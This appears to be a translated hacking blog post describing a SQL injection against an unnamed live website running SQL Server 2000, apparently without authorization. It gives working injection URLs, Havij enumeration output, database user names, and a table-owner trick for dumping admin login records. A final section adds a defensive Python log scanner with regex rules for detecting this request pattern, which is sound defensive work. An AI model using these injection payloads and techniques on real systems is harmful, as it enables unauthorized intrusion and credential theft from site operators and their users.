The day before yesterday I found an injection point on a well-known website. It is an MS SQL Server 2000 injection with error messages displayed. Without further ado, I simply ran Havij against it (PS: the version I used is Havij 1.14 Pro) and obtained the following information:
DB Server: MSSQL 2000 with error
Current User: chwebnews
Sql Version: Microsoft SQL Server 2000 - 8.00.760 (Intel X86)
Dec 17 2002 14:22:05
Copyright (c) 1988-2003 Microsoft Corporation
Enterprise Edition on Windows NT 5.0 (Build 2195: Service Pack 4)
Current DB: ChineseNews
All the databases were enumerated without trouble, and then the tables and columns were enumerated as well.
But the table contents could not be dumped: Havij reported that the row count could not be obtained.
I captured the traffic and got this statement:
http://XXXX.com/arc.asp?month=5&year=convert(int,(char(126)%2b
(SELECT TOP 1 cast(count(*) as nvarchar(4000)) FROM ci_admin )%2bchar(126)))
and 1=1
Pasting this statement into IE returned an error: the object ci_admin does not exist. Naturally, if the total number of records cannot be obtained, the data cannot be dumped either.
I thought it over: Havij should not be getting this wrong. I tried capitalizing ci_admin, URL-encoding it, and using the form database + ... + table name
(ChineseNews...ci_admin) or ChineseNews.dbo.ci_admin, but these still failed and the same error message was returned. Then I suddenly thought about what the dbo in front of the table name means: it refers to the database creator (the owner). Database name + owner name + table name is the complete form of a table name.
So the reason the "invalid object name" error is reported may be that the owner name is incorrect.
Havij could not pick up this table in its scan, so I had to add the sysusers table manually.
I also added the name column by hand instead of scanning for columns. Only the name column is added because, when Havij constructs an injection statement, it automatically includes the primary key found during the scan. As a result, the statement is malformed and non-primary-key data cannot be obtained. This appears to be a bug in the software.
Scanning sysusers returned 17 records:
Count(*) of sysusers is 17
Data Found: name=chinesews
Data Found: name=chwebnews
Data Found: name=db_accessadmin
Data Found: name=db_backupoperator
Data Found: name=db_datareader
Data Found: name=db_datawriter
Data Found: name=db_ddladmin
Data Found: name=db_denydatareader
Data Found: name=db_denydatawriter
Data Found: name=db_owner
Data Found: name=db_securityadmin
Data Found: name=dbo
Data Found: name=guest
Data Found: name=public
Data Found: name=web
Data Found: name=webnews
Data Found: name=wssnewsa
Substitute each of the user names obtained into the statement in turn (users starting with db_ can be ruled out immediately):
http://XXXX.com/arc.asp?month=5&year=convert(int,(char(126)%2b(SELECT TOP 1
cast(count(*) as nvarchar(4000)) FROM ChineseNews.{substituted variable}.ci_admin)%2bchar(126))) and 1=1
When the substituted value is chinesews, no error occurs and the expected result, 2, is displayed.
The following statement can then be used to obtain all the data:
http://XXXX.com/arc.asp?month=5&year=convert(int,(char(126)%2b
(SELECT TOP 1 cast(login as nvarchar(4000)) FROM (SELECT TOP 2 login FROM
ChineseNews.chinesews.ci_admin) sq order by login desc)%2bchar(126))) and 1=1
However, some tables cannot be read even when the statement is constructed correctly, because the current database user has not been granted SELECT permission on the table.
This cannot be solved by constructing a correct injection statement, as shown below:
SQLState: 42000
Native Error Code: 229
[MERANT][ODBC SQL Server Driver][SQL Server]SELECT permission denied on object ci_login, database EMS, owner dbo.
Summary: In SQL Server, database name + owner name + table name is the complete form of a table name. When an error says that the table does not exist during injection, check the table owner name in the injection statement; it is easy to overlook.
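For defenders, the requests in this write-up leave a recognizable trail in web server logs. The following Python is an added example, not part of the original post: it flags the convert(int, char(126)+...) request shape, reads of system tables, and one client cycling owner names in database.owner.table references. The log field order, the IP addresses and the object names in the sample lines are assumptions constructed for the example.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Rules derived from the request shapes shown in the write-up above.
RULES = {
    # convert(int, char(N)+(subquery)+char(N)) forces a conversion error
    "convert_int_marker": re.compile(
        r"convert\s*\(\s*int\s*,\s*\(?\s*char\s*\(\s*\d+\s*\)\s*\+", re.I),
    # a SELECT subquery inside a parameter that should be a plain number
    "subquery_in_param": re.compile(r"\(\s*select\s+top\s+\d+\s", re.I),
    # system tables read through the application (sysusers is the one on the page)
    "catalog_table": re.compile(r"\bsys(users|objects|columns)\b", re.I),
    # database.owner.table naming inside a request parameter
    "three_part_name": re.compile(r"\bfrom\s+\w+\.\w*\.\w+", re.I),
}
OWNER = re.compile(r"\bfrom\s+\w+\.(\w+)\.\w+", re.I)

def match_rules(query):
    """Return the names of all rules matching a URL-encoded query string."""
    decoded = unquote_plus(query)  # %2b -> '+', %20 -> ' '
    return {name for name, rx in RULES.items() if rx.search(decoded)}

def scan(log_lines):
    """Map client IP -> rules hit and distinct owner names tried."""
    found = defaultdict(lambda: {"rules": set(), "owners": set()})
    for line in log_lines:
        # Assumed field order: date time c-ip method uri-stem uri-query status
        _, _, c_ip, _, _, query, _ = line.split()
        hits = match_rules(query)
        if hits:
            found[c_ip]["rules"] |= hits
            found[c_ip]["owners"] |= {
                o.lower() for o in OWNER.findall(unquote_plus(query))}
    return dict(found)

# Constructed sample log lines (documentation IPs, made-up object names).
_P = "month=5&year=convert(int,(char(126)%2b(SELECT%20TOP%201%20cast("
_S = ")%2bchar(126)))%20and%201=1"
SAMPLE_LOG = [
    "2024-01-01 10:00:00 192.0.2.10 GET /arc.asp month=5&year=2011 200",
    f"2024-01-01 10:00:05 198.51.100.7 GET /arc.asp {_P}name%20as%20nvarchar(4000))%20FROM%20sysusers{_S} 500",
    f"2024-01-01 10:00:09 198.51.100.7 GET /arc.asp {_P}count(*)%20as%20nvarchar(4000))%20FROM%20ExampleDb.dbo.t_admin{_S} 500",
    f"2024-01-01 10:00:12 198.51.100.7 GET /arc.asp {_P}count(*)%20as%20nvarchar(4000))%20FROM%20ExampleDb.webuser.t_admin{_S} 500",
]

if __name__ == "__main__":
    for ip, info in scan(SAMPLE_LOG).items():
        print(ip, sorted(info["rules"]), "owners tried:", sorted(info["owners"]))
```

Several distinct owner names from one client against the same table, together with HTTP 500 responses, is the pattern worth alerting on; the SELECT permission denial shown earlier is the control that limits what such requests can read.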